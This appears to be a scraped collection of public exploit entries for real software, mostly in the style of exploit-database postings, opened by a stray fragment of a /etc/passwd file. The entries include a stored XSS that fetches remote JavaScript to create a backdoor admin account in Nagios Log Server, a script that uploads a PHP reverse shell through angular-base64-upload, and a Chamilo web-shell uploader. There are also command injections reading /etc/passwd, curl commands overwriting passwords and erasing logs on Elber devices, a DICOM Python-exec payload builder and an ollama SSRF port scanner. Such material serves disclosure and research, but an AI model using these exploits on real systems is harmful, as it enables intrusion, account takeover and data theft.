messagebus:x:999:998::/var/lib/dbus:/bin/false systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway: avahi:x:997:994::/var/run/avahi-daemon:/bin/false avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false sshd:x:995:992::/var/run/sshd:/bin/false xuser:x:1000:1000::/home/xuser: ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin mysql:x:993:65534::/var/mysql: aamtech:x:500:500::/home/aamtech:/bin/sh

Nagios Log Server 2024R1.3.1 - Stored XSS

# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin) # Date: 2025-04-02 # Exploit Author: Seth Kraft # Vendor Homepage: https://www.nagios.com/ # Vendor Changelog: https://www.nagios.com/changelog/#log-server # Software Link: https://www.nagios.com/products/log-server/download/ # Version: 2024R1.3.1 and below # Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04) # CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602 # CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H) # Type: Stored Cross-Site Scripting (XSS), Privilege Escalation # Exploit Risk: Critical # Disclosure For research and authorized testing only. Do not use against systems without permission. # Description: A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs, the script executes, resulting in privilege escalation via unauthorized admin account creation. The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations. # PoC 1. Log in as a standard (non-admin) user. 2. Navigate to the profile update endpoint: http://<target-ip>/nagioslogserver/profile/update 3. Inject the following payload into the email field: ```javascript <script> fetch("https://<EXTERNAL-HOST>/xss.js") .then(response => response.text()) .then(scriptText => eval(scriptText)) .catch(console.error); </script> ``` 4. Host the xss.js payload on your external server with the following content: ```javascript (function() { var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/); if (!csrfTokenMatch) return; var csrfToken = encodeURIComponent(csrfTokenMatch[1]); var requestBody = "csrf_ls=" + csrfToken + "&name=backdoor" + "&email=hacker@example.com" + "&username=backdoor" + "&password=Password123!" + "&password2=Password123!" 
+ "&auth_type=admin" + "&apiaccess=1" + "&language=en_US" + "&account_type=local"; fetch("http://<target-ip>/nagioslogserver/admin/users/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: requestBody }) .then(response => response.text()) .then(console.log) .catch(console.error); })(); ``` 5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account: Username: backdoor Password: Password123!
# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection # Exploit Author: Armando Huesca Prida # Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli # Date of Disclosure: 27/06/2024 # Date of CVE Publication: 4/10/2024 # Exploit Publication: 10/10/2024 # Vendor Homepage: https://www.microchip.com/ # Version: Firmware release 1.0 through 2.4.7 # Tested on: Firmware release 2.3.12 # CVE: CVE-2024-9054 # External References: # URL: https://www.cve.org/cverecord?id=CVE-2024-9054 # URL: https://0xhuesca.com/2024/10/cve-2024-9054.html # URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file # URL: https://www.gruppotim.it/it/footer/red-team.html # Vulnerability Description: A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution. # Exploitation Steps: 1- Perform login into the device's management web interface. 2- Download the device's configuration file. 3- Substitute the "secret_key" value with the malicious payload. 4- Save the new configuration file containing the OS command to be executed. 5- Restore and submit the new configuration. 6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload. # Example of malicious XML config file: <?xml version="1.0"?> [...] <security> [...] <server> <ip>192.168.1.1</ip> <secret_key>`ping 192.168.1.20`</secret_key> [...] </server> [...] </security> [...] 
# Proof of Concept - PoC: By manually modifying the following request, it is possible to obtain an interactive shell on the vulnerable device. The list of values to be updated in the exploit HTTP request is given below: - [session cookie] - [XML configuration file containing the injection on "secret_key" tag] - [Web account password in clear-text] - [device IP] # Exploit - Restore and submit config file HTTP Request: POST /config_restore HTTP/1.1 Host: [device IP] Cookie: ci_session=[session cookie] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002 Content-Length: 206640 Origin: https://[device IP] Referer: https://[device IP]/configbackuprestore Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive -----------------------------182708909322642582691204887002 Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt" Content-Type: text/plain [XML configuration file containing the injection on "secret_key" tag] -----------------------------182708909322642582691204887002 Content-Disposition: form-data; name="pword" [Web account password in clear-text] -----------------------------182708909322642582691204887002-- # End
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) # Date: 10 October 2024 # Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9) # Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9) # Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload # Software Link: https://github.com/adonespitogo/angular-base64-upload # Version: prior to v0.1.21 # Tested on: Arch Linux # CVE : CVE-2024-42640 # Severity: Critical - 10.0 (CVSS 4.0) # Github Link : https://github.com/rvizx/CVE-2024-42640 # Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html # DISCLAIMER: # This proof-of-concept (POC) exploit is provided strictly for educational and research purposes. # It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems. # The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities. # Any actions taken with this code are undertaken at the sole discretion and risk of the user. # The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems. # Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited. # By using this code, you agree to assume all responsibility and liability for your actions. # Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code. # It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software. # Proceed with caution and use this code responsibly. 
#!/bin/python3
"""PoC script for CVE-2024-42640 (angular-base64-upload demo upload endpoint).

Flow, as written: probe which dependency directory exposes the library's
demo page, read a version string out of its CHANGELOG.md, then upload a PHP
file through demo/server.php and request it back from demo/uploads/.

Defender notes grounded in the requests this script makes:
  - HEAD requests for .../angular-base64-upload/demo/index.html under
    bower_components/ and node_modules/ are the reconnaissance signature.
  - The upload is a JSON POST to demo/server.php with keys "base64" and
    "filename"; the file is then fetched from demo/uploads/<uuid>.php.
  - The affected range is "prior to v0.1.21" per the header above; not
    shipping the library's demo/ directory to production removes the sink
    regardless of version.
"""
import re
import subprocess
import requests
import sys
import os
import uuid
import base64


def banner():
    # Terminal banner; \033[2m / \033[0m are ANSI dim / reset sequences.
    print(''' \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9 https://github.com/rvizx/\033[0mCVE-2024-42640 ''')


def enum(url):
    """Locate the exposed demo page under *url* and hand it to exploit().

    Only the HTTP status of a HEAD request decides which directory is used;
    the version printed is the first CHANGELOG.md line containing "v0", or
    None if there is no such line.

    NOTE(review): the listing this was recovered from had lost its
    indentation; the nesting below (node_modules is probed only when the
    bower_components probe fails) is reconstructed — confirm against the
    upstream script linked in the header.
    """
    print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ")
    target = f"{url}/bower_components/angular-base64-upload/demo/index.html"
    r = requests.head(target)
    if r.status_code == 200:
        print("\033[94m[inf]:\033[0m target is using bower_components")
    else:
        print("\033[94m[inf]:\033[0m target is not using bower_components")
        target = f"{url}/node_modules/angular-base64-upload/demo/index.html"
        r = requests.head(target)
        if r.status_code == 200:
            print("\033[94m[inf]:\033[0m target is using node_modules")
        else:
            print("\033[94m[inf]:\033[0m target is not using node_modules")
            print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html")
            print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
            print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
            print("\033[91m[err]:\033[0m exiting..")
            exit()
    # CHANGELOG.md is fetched from the same directory as the demo page.
    version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None)
    print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version)
    exploit(target)


def exploit(target):
    """Upload a PHP file through the server.php next to *target* and request it back.

    The PHP content is downloaded at run time from a third-party GitHub URL
    (no pin or hash check in this script), has the listener address and port
    substituted in, and is written to the current working directory under a
    random .php name before being base64-encoded and POSTed as JSON.

    NOTE(review): indentation was lost in the listing; the placement of the
    final "please check the listener" message inside the failure branch is
    reconstructed — confirm against the upstream script.
    """
    print(f"[dbg]: {target}")
    target_server_url = target.replace("index.html","server.php")
    print(f"[dbg]: {target_server_url}")
    payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
    print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
    ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
    port = input("\033[93m[ins]:\033[0m enter listenter port: ")
    print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
    input("\033[93m[ins]:\033[0m press enter to continue...")
    print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
    response = requests.get(payload_url)
    if response.status_code == 200:
        php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
        payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name
        with open(payload_name, "w") as file:
            file.write(php_code)
    else:
        print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
        print("\033[91m[err]:\033[0m exiting..")
        exit()
    with open(payload_name, 'rb') as file:
        file_content = file.read()
    base64_payload = base64.b64encode(file_content).decode('utf-8')
    headers = {
        'Content-Type': 'application/json',
    }
    json_data = {
        'base64': base64_payload,
        'filename': payload_name,
    }
    # verify=False: TLS certificate validation is disabled for this request.
    response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
    print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
    updemo_endpoint = f"uploads/{payload_name}"
    print(f"[dbg]: {updemo_endpoint}")
    payload_url = target_server_url.replace("server.php",updemo_endpoint)
    print(f"[dbg]: {payload_url}")
    if response.status_code == 200:
        print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}")
        print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
        r = requests.get(payload_url)
        if r.status_code == 200:
            print("\033[94m[inf]:\033[0m process complete!")
        else:
            print("\033[91m[err]:\033[0m something went wrong!")
            print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")


if __name__ == "__main__":
    # The bare except also turns any network error raised inside enum() or
    # exploit() into the usage message.
    try:
        banner()
        url = sys.argv[1]
        print(f"\033[94m[inf]:\033[0m target: {url}")
        enum(url)
    except:
        print("[usg]: ./exploit.py <target-url>")
        exit()
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. 
-------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5820 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5823 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 
'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

Invesalius3 - Remote Code Execution

# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti #(partywave) # Date: 23/08/2024 # Vendor Homepage: https://invesalius.github.io/ # Software Link: #https://github.com/invesalius/invesalius3/tree/master/invesalius # Version: 3.1.99991 to 3.1.99998 # Tested on: Windows # CVE: CVE-2024-42845 # External References: #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, #https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan # Description: #---------------- # #A Remote Code Execution (RCE) vulnerability exists in the DICOM file import #procedure in Invesalius3. This vulnerability afflicts all versions from #3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability #involve the use of a crafted DICOM file which, once imported inside the #victim's client application allows an attacker to gain remote code #execution over the victim's machine. # Script: #---------------- # ### # The script below creates a specifically crafted DICOM payload for #CVE-2024-42845. Remote Code Execution is gained once the DICOM file is #imported inside the victim's client application. 
### import pydicom import base64 import argparse pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE def encode_payload(plain_payload): data = open(plain_payload, 'rb').read() return f"exec(__import__('base64').b64decode({base64.b64encode(data)})" def prepare_dicom_payload(dicom_file_path, payload): try: dicom_data = pydicom.dcmread(dicom_file_path) values = dicom_data[0x0020, 0x0032].value mal = [str(i) for i in values] mal.append(encode_payload(payload)) except pydicom.errors.InvalidDicomError: print("The file is not a valid DICOM file.") except Exception as e: print(f"An error occurred: {e}") return mal def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign): try: dicom_dataset = pydicom.dcmread(dicom_file_path) if sign: dicom_dataset.Manufacturer = "Malicious DICOM file creator" dicom_dataset.InstitutionName = "Malicious DICOM file institution" elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag) dicom_dataset[0x00200032] = elem print(dicom_dataset) dicom_dataset.save_as(outfile) except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Read a DICOM file.') parser.add_argument('--dicom', required=True, help='Path to the input DICOM file') parser.add_argument('--outfile', required=True, help='Path to the output DICOM file') parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code') parser.add_argument('--signature', required=False, default=True) args = parser.parse_args() dicom_infile_path = args.dicom dicom_outfile_path = args.outfile print(args.signature) tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload) if tmp_tag: malicious_tag = '\\'.join(tmp_tag) modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature) exit(0) else: exit(1)

Gitea 1.22.0 - Stored XSS

# Exploit Title: Stored XSS in Gitea # Date: 27/08/2024 # Exploit Authors: Catalin Iovita & Alexandru Postolache # Vendor Homepage: (https://github.com/go-gitea/gitea) # Version: 1.22.0 # Tested on: Linux 5.15.0-107, Go 1.23.0 # CVE: CVE-2024-6886 ## Vulnerability Description Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint. 3. In the Description field, input the following payload: <a href=javascript:alert()>XSS test</a> 4. Save the changes. 5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

dizqueTV 1.5.3 - Remote Code Execution (RCE)

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

NoteMark < 0.13.0 - Stored XSS

# Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "Editor" tab. 4. Input the following payload: [xss-link](javascript:alert(1)) 5. Save the changes. 6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert. ## HTTP Request PoC PUT /api/notes/<note-uuid>/content HTTP/1.1 Host: localhost:8000 Accept: */* Content-Type: text/plain;charset=UTF-8 Content-Length: 34 Sec-Fetch-Site: same-origin Authorization: Bearer <TOKEN> [xss-link](javascript:alert(1))

Chamilo LMS 1.11.24 - Remote Code Execution (RCE)

# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
# Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
# Exploit Date: September 3, 2024
# Vendor Homepage: https://chamilo.org/
# Software Link: https://chamilo.org/
# Version: 1.11.24 (Beersel)
# Tested Versions: 1.11.24 (Beersel) - August 31, 2023
# CVE ID: CVE-2023-4220
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, File Upload
# CVSS Score: 8.1 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
# License: MIT License
# References:
# - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
# - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
# - Vendor Advisory: https://chamilo.org/
"""PoC for CVE-2023-4220: unauthenticated file upload through bigUpload.php.

Defender notes grounded in the two requests this script makes:
  - Upload: multipart POST to main/inc/lib/javascript/bigupload/inc/bigUpload.php
    with action=post-unsupported and a form field named bigUploadFile.
  - Execution: GET of the uploaded name under
    main/inc/lib/javascript/bigupload/files/ with a cmd query parameter.
Both are distinctive enough for a web-log or WAF rule.  Denying script
execution in that files/ directory and keeping it non-writable by the web
server removes the sink even on an unpatched install (the header's "Notes"
line states the PoC needs it writable).
"""
import requests
import argparse
from urllib.parse import urljoin


def upload_shell(target_url, payload_name):
    """POST a one-line PHP file named *payload_name* to the bigUpload endpoint.

    Prints the expected URL of the stored file on HTTP 200; returns nothing.
    Note the leading slash in shell_path: urljoin resolves it against the
    host root, whereas upload_url is resolved relative to target_url.
    """
    upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
    shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
    shell_url = urljoin(target_url, shell_path)
    # Payload containing the PHP web shell
    files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
    # Upload the payload
    response = requests.post(upload_url, files=files)
    if response.status_code == 200:
        print("[+] File uploaded successfully!")
        print(f"[+] Access the shell at: {shell_url}?cmd=")
    else:
        print("[-] File upload failed.")


def execute_command(shell_url, cmd):
    """GET *shell_url* with *cmd* placed, unencoded, in the cmd query parameter and print the body."""
    # Execute the command
    response = requests.get(f"{shell_url}?cmd={cmd}")
    if response.status_code == 200:
        print(f"[+] Command Output:\n{response.text}")
    else:
        print(f"[-] Failed to execute command at {shell_url}")


if __name__ == "__main__":
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
    parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
    parser.add_argument('cmd', help="The command to execute on the remote server")
    parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
    args = parser.parse_args()
    # Run the exploit with the provided arguments
    upload_shell(args.target_url, args.shell)
    # Form the shell URL to execute commands
    shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
    execute_command(shell_url, args.cmd)
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) # Exploit Author: Armando Huesca Prida # Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli # Date of Disclosure: 27/06/2024 # Date of CVE Publication: 4/10/2024 # Exploit Publication: 10/10/2024 # Vendor Homepage: https://www.microchip.com/ # Version: Firmware release 1.0 through 2.4.7 # Tested on: Firmware release 2.3.12 # CVE: CVE-2024-43687 # External References: # URL: https://www.cve.org/cverecord?id=CVE-2024-43687 # URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html # URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner # URL: https://www.gruppotim.it/it/footer/red-team.html # Vulnerability Description: The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context. # Exploitation Steps: 1- Log in to the device's web management interface. 2- Open the banner configuration panel. 3- Select the "custom banner" feature. 4- Insert the malicious JavaScript payload. 5- Apply and save the system configuration containing the custom banner. 6- Victims who connect to the device's web management interface will execute the malicious payload in their browser. # Example of malicious JavaScript payload: <img src=a onerror=alert(1)> # Proof of Concept - PoC: By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. 
The list of values that must be updated in the exploit HTTP request is given below: - [session cookie] - [malicious JavaScript payload] - [device IP] # Exploit - HTTP Request: POST /bannerconfig HTTP/1.1 Host: [device IP] Cookie: ci_session=[session cookie] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502 Content-Length: 673 Origin: https://[device IP] Referer: https://[device IP]/bannerconfig Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: keep-alive -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="user_level" 1 -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="bannerradio" CUSTOMIZED -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="txtcustom" [malicious JavaScript payload] -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="action" applybanner -----------------------------9680247575877256312575038502-- # End

ollama 0.6.4 - Server Side Request Forgery (SSRF)

# Exploit Title: ollama 0.6.4 - SSRF # Date: 2025-04-03 # Exploit Author: sud0 # Vendor Homepage: https://ollama.com/ # Software Link: https://github.com/ollama/ollama/releases # Version: <=0.6.4 # Tested on: CentOS 8 import argparse import requests import json from urllib.parse import urljoin def check_port(api_base, ip, port): api_endpoint = api_base.rstrip('/') + '/api/create' model_path = "mynp/model:1.1" target_url = f"https://{ip}:{port}/{model_path}" payload = { "model": "mario", "from": target_url, "system": "You are Mario from Super Mario Bros." } try: response = requests.post(api_endpoint, json=payload, timeout=10, stream=True) response.raise_for_status() for line in response.iter_lines(): if line: try: json_data = json.loads(line.decode('utf-8')) if "error" in json_data and "pull model manifest" in json_data["error"]: error_msg = json_data["error"] model_path_list = model_path.split(":", 2) model_path_prefix = model_path_list[0] model_path_suffix = model_path_list[1] model_path_with_manifests = f"{model_path_prefix}/manifests/{model_path_suffix}" if model_path_with_manifests in error_msg: path_start = error_msg.find(model_path_with_manifests) result = error_msg[path_start+len(model_path_with_manifests)+3:] if path_start != -1 else "" print(f"Raw Response: {result}") if "connection refused" in error_msg.lower(): print(f"[!] Port Closed - {ip}:{port}") else: print(f"[+] Port Maybe Open - {ip}:{port}") return except json.JSONDecodeError: continue print(f"[?] Unkown Status - {ip}:{port}") except requests.exceptions.RequestException as e: print(f"[x] Execute failed: {str(e)}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="ollama ssrf - port scan") parser.add_argument("--api", required=True, help="Ollama api url") parser.add_argument("-i", "--ip", required=True, help="target ip") parser.add_argument("-p", "--port", required=True, type=int, help="target port") args = parser.parse_args() check_port(args.api, args.ip, args.port)

AppSmith 1.47 - Remote Code Execution (RCE)

